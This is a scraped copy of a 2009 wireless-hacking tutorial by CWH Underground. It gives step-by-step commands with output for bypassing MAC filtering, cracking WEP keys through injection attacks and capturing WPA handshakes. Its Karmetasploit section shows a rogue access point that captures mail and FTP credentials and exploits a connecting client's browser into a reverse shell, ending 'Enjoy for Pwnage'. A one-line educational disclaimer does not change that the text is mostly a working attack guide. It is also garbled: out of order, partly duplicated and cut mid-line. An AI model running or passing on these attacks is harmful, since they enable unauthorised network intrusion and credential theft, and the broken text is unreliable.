                  Notice: The successful rate is up to dictionary size

                  Now ASLEAP 2.2, which includes the “-C†           and “-R†     options to specify the hex-delimited bytes for the challenge an

           [0x10] - Mass Exploit with Karmetasploit

                  HD Moore released some documentation ( to get karmetasploit working with the

                  Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, cre
                  of the client and still also exploit the browser vulnerabilities on client machine.

                  This Method was test in Backtrack3 (Final)

                  1. Update Aircrack-NG

                           $ svn co aircrack-ng
                           $ make
                           # make install

9 of 12                                                                                                                          12/24/10 5:48 PM
Vulnerability analysis, Security Papers, Exploit Tutorials                             

                  2. Let's do our aireplay-ng test to see if things are working (Your WIFI card must support for Injection packet)

                           bt# aireplay-ng -9 wlan0

                           15:10:21 Trying broadcast probe requests...
                           15:10:21 Injection is working!
                           15:10:25 Found 5 APs

                           15:10:25 Trying directed probe requests...
                           15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
                           15:10:35 0/30: 0%

                           15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
                           15:10:42 0/30: 0%

                           15:10:42   00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
                           15:10:48   Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
                           15:10:48   5/30: 60%
                           15:10:48   Injection is working!

                           15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
                           15:56:53 0/30: 0%

                    Now It's work for Injection !!

                  3. Update Metasploit

                           $ svn co msf3

                  4. Download Bash script from

                           The script will do the following:
                           - Change the MAC address of the interface
                           - Set the Interface in Monitor Mode
                           - Start the Karma AP with Airbase-ng
                           - Change the MTU Size for the interface
                           - Set the IP
                           - Start the DHCPD server
                           - Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
                           - Start Metasploit.

                  6. After that we run our like this:

                  #./ -i wlan0 -m km -s linksys

                  Changing MAC Address
                  Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
                  Faked MAC:   00:40:1b:5b:b0:0b (Printer Systems Corp.)
                  starting fake ap
                  This will take 15 seconds ..............
                  DHCPD started successfully
                  Starting Packet capture to /root/kms.cap
                  Starting Metasploit

                                                 | |      o
                  _ _ _     _ _|_ __,   ,     _ | | __      _|_
                  / |/ |/ | |/ | / | / _|/ _|/ / _| |
                    | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/

                  =[ msf v3.2-release
                  + -- --=[ 304 exploits - 124 payloads
                  + -- --=[ 18 encoders - 6 nops
                  =[ 79 aux

                  resource> load db_sqlite3
                  [*] Successfully loaded plugin: db_sqlite3
                  resource> db_create /root/karma.db
                  [*] The specified database already exists, connecting
                  [*] Successfully connected to the database
                  [*] File: /root/karma.db
                  resource> use auxiliary/server/browser_autopwn
                  resource> setg AUTOPWN_HOST
                  AUTOPWN_HOST =>
                  resource> setg AUTOPWN_PORT 55550
                  AUTOPWN_PORT => 55550
                  resource> setg AUTOPWN_URI /ads
                  AUTOPWN_URI => /ads
                  resource> set LHOST
                  LHOST =>
                  resource> set LPORT 45000
                  LPORT => 45000
                  resource> set SRVPORT 55550
                  SRVPORT => 55550
                  resource> set URIPATH /ads
                  URIPATH => /ads
                  resource> run

10 of 12                                                                                                               12/24/10 5:48 PM
Vulnerability analysis, Security Papers, Exploit Tutorials                          

                  [*] Starting exploit modules on host
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Started reverse handler
                  [*] Server started.
                  [*] Using URL:
                  [*] Local IP:
                  [*] Server started.
                  [*] Auxiliary module running as background job
                  resource> use auxiliary/server/capture/pop3
                  resource> set SRVPORT 110
                  SRVPORT => 110
                  resource> set SSL false
                  SSL => false
                  resource> run
                  [*] Server started.
                  [*] Auxiliary module running as background job
                  resource> use auxiliary/server/capture/pop3
                  resource> set SRVPORT 995
                  SRVPORT => 995
                  resource> set SSL true
                  SSL => true
                  resource> run
                  [*] Server started.
                  [*] Auxiliary module running as background job
                  resource> use auxiliary/server/capture/ftp
                  resource> run
                  [*] Server started.


                  [*] Sending Firefox location.QueryInterface() Code Execution to
                  [*] Command shell session 2 opened ( ->

                  msf auxiliary(http) > sessions -i 2
                  [*] Starting interaction with 2...

                  Microsoft Windows XP [Vesion 5.1.2600]
                  (C) Copyright 1985-2001 Microsoft Corp.

                  D:Mozilla Firefox> cd ..

                  D:net user

                  User accounts for CWH

                  __vmware_user__          Administrator            ASPNET
                  Guest                    HelpAssistant            IUSR_CWH
                  IWAM_CWH                 CWH                      SUPPORT_388945a0
                  The command completed successfully.

                  Enjoy for Pwnage !!. Oops, For pentest :p

11 of 12                                                                                                            12/24/10 5:48 PM
Vulnerability analysis, Security Papers, Exploit Tutorials                           

            [0x11] - References

           [1]   PaulDotCom Forum

            [0x12] - Greetz To

           Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
           Special Thx : asylu3, str0ke,,

                   This paper is written for Educational purpose only. The authors are not responsible for any damage
            originating from using this paper in wrong objective. If you want to use this knowledge with other person systems,
                                           you must request for consent from system owner before

           # [2009-02-24]

                                                             © Offensive Security 2010

12 of 12                                                                                                              12/24/10 5:48 PM

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This document discusses hacking tools and techniques that could enable man-in-the-middle attacks on wireless networks. It describes how a wireless penetration testing device could intercept probe requests from a device looking to connect to a wireless network, and respond posing as the legitimate network to establish a connection. Once connected, the device could monitor and manipulate web traffic using tools like Cain & Abel, ARP poisoning, and DNS spoofing. Rainbow tables are also mentioned as a tool for cracking Windows passwords using hashed values within a few minutes. Throughout, the document emphasizes these techniques should only be used for legitimate security testing and not illegal hacking.

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Wi-Foo Ninjitsu Exploitation

  • 1. Vulnerability analysis, Security Papers, Exploit Tutorials Wi-Foo Ninjitsu Exploitation |=--------------------------------------------------------------------=| |=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=| |=-----------------------=[ 24 February 2009 ]=-----------------------=| |=---------------------=[ By CWH Underground ]=---------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : Wi-Foo Ninjitsu Exploitation Author : JabAv0C && ZeQ3uL Team : CWH Underground [] Website : / Date : 2009-02-24 ########## Contents ########## [0x00] - Introduction [0x01] - Security of Wireless network [0x02] - Breaking the Simple Defenses [0x02a] - Mac Filtering [0x02b] - Discover Hidden SSID [0x02c] - Sniffing informations on the Air [0x03] - Get closer with cracking tool [0x03a] - Aircrack-ng suite [0x03b] - Decrypt packet with airdecap-ng [0x03c] - Decloak packet with airdecloak-ng [0x03d] - AirCracking 101 [0x04] - Owned the WEP Key with Simple Technique (No Injection) [0x04a] - Capturing method [0x04b] - Cracking method [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method) [0x05a] - Monitor Mode [0x05b] - Fake Authentication [0x05c] - Arp Replay Attack [0x05d] - Fragmentation Attack [0x05e] - Korek ChopChop Attack [0x05f] - Packetforge [0x05g] - ARP Request Replay with Interactive Attack [0x05h] - Cracking WEP Key [0x06] - Conclusion steps for cracking WEP [0x07] - Owned the WPA-PSK/WPA2-PSK Key [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP) [0x09] - Exploiting CISCO LEAP [0x10] - Mass Exploit with Karmetasploit [0x11] - References [0x12] - Greetz To ####################### [0x00] - Introduction ####################### This paper introduce practical techniques used by hackers to break the wireless security. We recommend that the reader should have basic knowledge of wireless operation. This paper contains 13 sections but practical content is in 10 sections, from 0x02 to 0x10. In section 0x02, we talk about basic attacking to wireless network. Section 0x03 has content about tools used through this tutorial. In section 0x04, 0x05 and 0x06, we provide information to crack WEP. Section 0x07, 0x08 and 0x09 are the detail of cracking WPA and WPA2. Section 0x10 is detail about using metasploit in wireless network through rogue AP. ####################################### [0x01] - Security of Wireless Network 1 of 12 12/24/10 5:48 PM
  • 2. Vulnerability analysis, Security Papers, Exploit Tutorials ####################################### Wireless network has serious drawback when comparing with wired network because it use air as media. So, hackers are capab by using man in the middle method or others. Therefore, security issue in wireless is highly concerned and until now, the security standard of wireless can divide like - WEP - WPA-PSK - WPA2-PSK - WPA-802.1x - WPA2-802.1x WEP is the original security standard for wireless network but it is cracked easily. WPA and WPA2 are offerred to increase and solve the vulnerabilities in WEP. WPA and WPA2 still also devide to Pre-shared Key and 802.1x which are used for personal and respectively. In addition to these standards, there are other mechanisms to enhance wireless security such as, hidden ssid, MAC fi talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker wireless network. ####################################### [0x02] - Breaking the Simple Defenses ####################################### ++++++++++++++++++++++++++++++++ [0x02a] - Bypass Mac Filtering ++++++++++++++++++++++++++++++++ This is a basic security method by storing legitimate client MAC address in the access point. When there is authen to access point, the access point compares the requesting MAC address with MAC address stored in its memory. If the result the authentication is success otherwise it is failed. However, this method is easy to bypass, the attacker is only change We have a case study of bypassing MAC filtering attack. One day, we have a change to do the wireless penetration t First, we use kismet to discover the access points around the company. This make us know the exact location of each access by fixing channel for capturing packets. Fixing the target channel can improve efficiency of airodump-ng. We know from air the access point use open authentication and it does not use any encryption. So, we try to connect to the access point but our authentication request. We conclude that this network use MAC filtering. From airodump-ng, we see that there are clien We immediately change our MAC address to be like the associated client and try to connect again. In this time, everything Moreover, we are able to access internal network of this company and run any tools, such as nmap, nessus, exploit, against ++++++++++++++++++++++++++++++++ [0x02b] - Discover Hidden SSID ++++++++++++++++++++++++++++++++ Some environment, wireless administrator config to hidden ssid. So, the attacker cannot know the ssid of network and also cannot connect to that network. In airodump, it shows <lenght ?> where ? is the number of ssid lenght. The only way to know the ssid name is from association request. This packet occurs when there is a legitimate client conne We are able to force a legitimate client to re-connect to access point by sending de-authentication packet to the client b The command for doing that is like this: #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] After sending du-authentication packet to the client, the client will do re-authentication and re-association. Airodump-ng can detect this process and know SSID of this network. ++++++++++++++++++++++++++++++++++++++++++++ [0x02c] - Sniffing informations on the Air ++++++++++++++++++++++++++++++++++++++++++++ This topic does not use any advance technique or deep knowledge. Many wireless networks use open authentication wi encryption mechanism. The attacker needs only sniffing packets from the air and find the credential information of protoco telnet, ftp etc. These protocol does not have any encryption. So, we can find username and password by only looking the ca We are able to sniff others data by using airodump-ng. ########################################### [0x03] - Get closer with cracking tool ########################################### We Recommend to use Aircrack-NG, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wirel +++++++++++++++++++++++++++++ [0x03a] - Aircrack-ng suite +++++++++++++++++++++++++++++ There are four tools in aircrack-ng suite which play an important role in this tutorial. - airodump-ng: used for capturing packets Use airodump-ng first every time in order to open monitor mode, which also enable injection capability of our card - aireplay-ng: used for injection o de-authentication: used to send deauthentication packet to associated client o fake authentication: used to perform fake authentication process o interactive packet replay: used to choose the preferred packet to perform replay attack o arp replay: used to perform arp replay attack automatically 2 of 12 12/24/10 5:48 PM
  • 3. Vulnerability analysis, Security Papers, Exploit Tutorials o Korek chopchop: used to generate key stream by using chopchop technique o fragment: used to generate key stream by using fragment technique - packetforge-ng: used for create packet - aircrack-ng: used for recovering key More detail: +++++++++++++++++++++++++++++++++++++++++++ [0x03b] - Decrypt packet with airdecap-ng +++++++++++++++++++++++++++++++++++++++++++ After we got WEP or WPA key, sometime we want to decrypt captured packet. Aircrack team has already provide us the tool for doing that. It is called "airdecap-ng". Examples of using airdecap is something like: #airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap or #airdecap-ng -e Workshop workshop-02.cap The output from these commands is file ending with "-dec.cap". PS. for WPA, airdecap-ng will return successful result for only file which contains four ways handshake. +++++++++++++++++++++++++++++++++++++++++++++ [0x03c] - Decloak packet with airdecloak-ng +++++++++++++++++++++++++++++++++++++++++++++ Cloaking is a technique to disturb cracking WEP key process. This technique is done by injecting packets which are to the network, these packets are called "chaff". If the attacker capture these packet and do the cracking, The result wil returned. However, aircrack team developped the tool to deal with this technique, it is called "airdecloak-ng". #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap This command return two files: - workshop-01-filtered.cap: contain the filtered packets from specific bssid - workshop-01-cloaked.cap: contain the cloaked packets from specific bssid ++++++++++++++++++++++++++++ [0x03d] - AirCracking 101 ++++++++++++++++++++++++++++ PTW Attack (-z) (aircrack-ng -z capture.cap), Only work for WEP 64/128 bits, Require ARP request/replay packet that you mu Dictionary Attack (WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap) Fudge Attack (-f) Once hit 2 millions IVs, Try fudge factor to "-f 4". Retry, increasing the fudge factor by adding 4 to it ** All the while, keep collecting data. Remember the golden rule, "The More IVs the Better" ################################################################# [0x04] - Owned the WEP Key with Simple Technique (No Injection) ################################################################# WEP is just like a dead method to protect network from unauthorized access. There are several means to crack WEP k The first of all, we should prepare the device which supports monitor mode and can inject packet to the network. After that we prepare tools for cracking, I choose to use aircrack-ng in BT3 final on vmware. Ok, let clear about concept of cracking WEP. The main idea is to collect the encrypted packets as much and fast as we can and then use these packets to crack for the W So, there are two situations from the above idea. 1. The network is high traffic. 2. The network is low traffic. What's different between them? Of course, the first case, we use only airodump to collect packet and crack the key but the second case, we have to inject packets to capture more packets. We introduce you, first, the capturing and cracking method. Then we talk about injecting method which is used only with low traffic network. ++++++++++++++++++++++++++++ [0x04a] - Capturing method ++++++++++++++++++++++++++++ First, introduce you the way to collect packets. For 64-bits WEP key, we use about 50,000 IV packets and about 150,000 IV packets for 128-bits WEP key. The command for collecting packets is #airodump-ng –w workshop rausb0 3 of 12 12/24/10 5:48 PM
  • 4. Vulnerability analysis, Security Papers, Exploit Tutorials ------------------------------------------------------------------------------------------ [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop BSSID STATION PWR Rate Lost Packets Probes xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747 ------------------------------------------------------------------------------------------ We will get file “workshop-01.cap†used for cracking the key later. We can determine the number of packet by the data field, around 90% of packets showing in data field are our required IV p +++++++++++++++++++++++++++ [0x04b] - Cracking method +++++++++++++++++++++++++++ After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key. #aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap -b xx:xx:xx:xx:xx:xx is the MAC address of target access point The successful cracking result is following: --------------------------------------------------------------- Opening workshop-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% --------------------------------------------------------------- ######################################################################### [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method) ######################################################################### This method is not necessary in high traffic network but it is very important in low traffic network. The idea behind this we have to inject a packet to force access point to generate new packet back to client. The new packet contains new IV. If we carefully think about above idea, the source MAC address must be associated, the packet must send from client to acc and the packet must cause the access point to produce the response or another packet; normally we should the packet which has broa We can conclude about the requirements of chosen packet for injection as following. - The MAC address is associated to access point. (we can do this by fake authentication) - Send from client to access point. (the “To DS†flag is set to 1) - The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF) The well-known packet which covers all requirements is arp request broadcast. In the aircrack-ng suite, there is aireplay- - The network has ARP request. - The network has no ARP request. No matter which case we are faced with, the important we have to realize is that we have to perform injection with associa Now, we have two choices. First is to change our MAC address to be the associated MAC address or the second is to do fake authenti ++++++++++++++++++++++++ [0x05a] - Monitor Mode ++++++++++++++++++++++++ Using airmon-ng for setting your wifi card to Monitor Mode and prepare for Injection packet. #airmon-ng start wlan0 11 Setting wlan0 to Monitor mode on channel 11, We must specify the same channel as the target AP channel. +++++++++++++++++++++++++++++++ [0x05b] - Fake Authentication +++++++++++++++++++++++++++++++ We can do fake authentication by following command. #aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –a xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card If we get successful result, our MAC address will associate with particular access point. The successful result look like: ------------------------------------------ 00:00:00 Sending Authentication Request 00:00:00 Authentication successful 00:00:00 Sending Association Request 00:00:00 Association successful :-) ------------------------------------------ After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropri 4 of 12 12/24/10 5:48 PM
  • 5. Vulnerability analysis, Security Papers, Exploit Tutorials +++++++++++++++++++++++++++++ [0x05c] - Arp Replay Attack +++++++++++++++++++++++++++++ We can use arp replay attack by following command. #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –b xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card Aireplay-ng will detect arp request and use it to perform replay attack automatically. The response will look like following when it find out arp request. ------------------------------------------------------------------------------------ 21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 Saving ARP requests in replay_arp-0223-210620.cap You should also start airodump-ng to capture replies. Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps) ------------------------------------------------------------------------------------ ** In some cases, there is no arp request broadcasted from access point. So, we cannot use normal arp replay attac We have to generate key stream from captured packet and use the key stream to forge arp request packet and then replay to in order to generate new IV packet. There are two ways for generate key stream called “chopchop attack†and “fragme Both methods can perform by aireplay-ng. ++++++++++++++++++++++++++++++++ [0x05d] - Fragmentation Attack ++++++++++++++++++++++++++++++++ Fragment attack is used to generate key stream in a size of 1500 bytes. So, we can use this key stream to create a which has size up to 1500 bytes. The command for fragment attack is #aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 The system responds with this: ------------------------------------------------------------------------------- 21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 21:21:07 Waiting for a data packet... Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r 0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8* 0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c 0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z 0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z. Use this packet ? ------------------------------------------------------------------------------- We have to answer "y" ----------------------- Use this packet ? y ----------------------- And the successful process looks like this: ---------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-212107.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0223-212107.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream ---------------------------------------------------------------------------------- +++++++++++++++++++++++++++++++++ [0x05e] - Korek ChopChop Attack +++++++++++++++++++++++++++++++++ There is a guy called KoreK who develop the tricky attacking method called chopchop. It requires only one encrypte to get key stream and then use the key stream to generate arp request packet and finally perform arp replay attack. We are able to use chopchop attack with this command. 5 of 12 12/24/10 5:48 PM
  • 6. Vulnerability analysis, Security Papers, Exploit Tutorials #aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng will pick a packet for decrypting. we can should any packet which has BSSID like our target. The response from the command looks like this: -------------------------------------------------------------------------------------- 21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N 0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. 0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K.... 0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. 0x0050: b09b f0f1 8b04 fc1c 0b72 .........r Use this packet ? ---------------------------------------------------------------------------------------- And we will answer by typing "y" like this --------------------- Use this packet ? y --------------------- And then the system do the decrypting --------------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-211242.cap Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms The AP appears to drop packets shorter than 37 bytes. 6 of 12 12/24/10 5:48 PM
  • 7. Vulnerability analysis, Security Papers, Exploit Tutorials Enabling standard workaround: IP header re-creation. This doesn't look like an IP packet, try another one. Warning: ICV checksum verification FAILED! Trying workaround. The AP appears to drop packets shorter than 40 bytes. Enabling standard workaround: IP header re-creation. Saving plaintext in replay_dec-0223-211410.cap Saving keystream in replay_dec-0223-211410.xor Completed in 21s (2.48 bytes/s) --------------------------------------------------------------------------------------- The result from this process is xor file and cap file. xor file contains key stream and cap file contains decrypted packet +++++++++++++++++++++++ [0x05f] - Packetforge +++++++++++++++++++++++ Creat encrypted packet form PRGA (XOR) that obtained from chopchop or fragment. #Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k –l –y re The result is: ---------------------- Wrote packet to: arp ---------------------- From this command, we get arp request packet in file named “arp†. ++++++++++++++++++++++++++++++++++++++++++++++++++++++ [0x05g] - ARP Request Replay with Interactive Attack ++++++++++++++++++++++++++++++++++++++++++++++++++++++ We use aireplay to inject arp request packet to access point by following command. #aireplay-ng -2 –r arp rausb0 The response will look like: ----------------------------------------------------------------------------------- Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:21:27:C0:07:71 0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q 0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4 0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; 0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ 0x0040: 66bf 700e f.p. Use this packet ? ----------------------------------------------------------------------------------- We have to answer "y" --------------------- Use this packet ? y --------------------- aireplay-ng starts injecting the packet. ------------------------------------------------------- Saving chosen packet in replay_src-0223-211755.cap You should also start airodump-ng to capture replies. Sent 1200 packets...(499 pps) ------------------------------------------------------- ++++++++++++++++++++++++++++ [0x05h] - Cracking WEP Key ++++++++++++++++++++++++++++ After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key. #aircrack-ng –z capture1.cap (PTW Attack) The successful cracking result is following: --------------------------------------------------------------- Opening capture1.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% --------------------------------------------------------------- 7 of 12 12/24/10 5:48 PM
  • 8. Vulnerability analysis, Security Papers, Exploit Tutorials ############################################## [0x06] - Conclusion Scripts for Cracking WEP ############################################## Note: $AP is Access Point MAC Address $WIFI is WIFI Card MAC Address - airmon-ng start wlan0 11 (Must specific channel of Monitor Mode) - airodump-ng -c 11 -w capture1.cap wlan0 - aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 - aireplay-ng -4 -b $AP -h $WIFI wlan0 If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 - packetforge-ng -0 -a $AP -h $WIFI -k -l -y replay_dec-03.xor -w arp-request - aireplay-ng -2 -r arp-request wlan0 - aircrack-ng -z capture1.cap ** These Method can use for Crack WEP with Clientless ######################################### [0x07] - Owned the WPA-PSK/WPA2-PSK Key ######################################### PSK stands for Pre-Shared Key. These are mechanism improved to solve WEP vulnerabilities. So, it is able to crack the key by using the same ways as cracking WEP. The only way to recover WPA-PSK or WPA2-PSK is to capture four ways handshake and crack by using dictionary attack. The idea for cracking Pre-shared key is to gather four ways handshake packet. We are able to do this by de-authenticate as This way will force the client to perform re-authentication and we can get four ways handshake from this process. The command for #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: 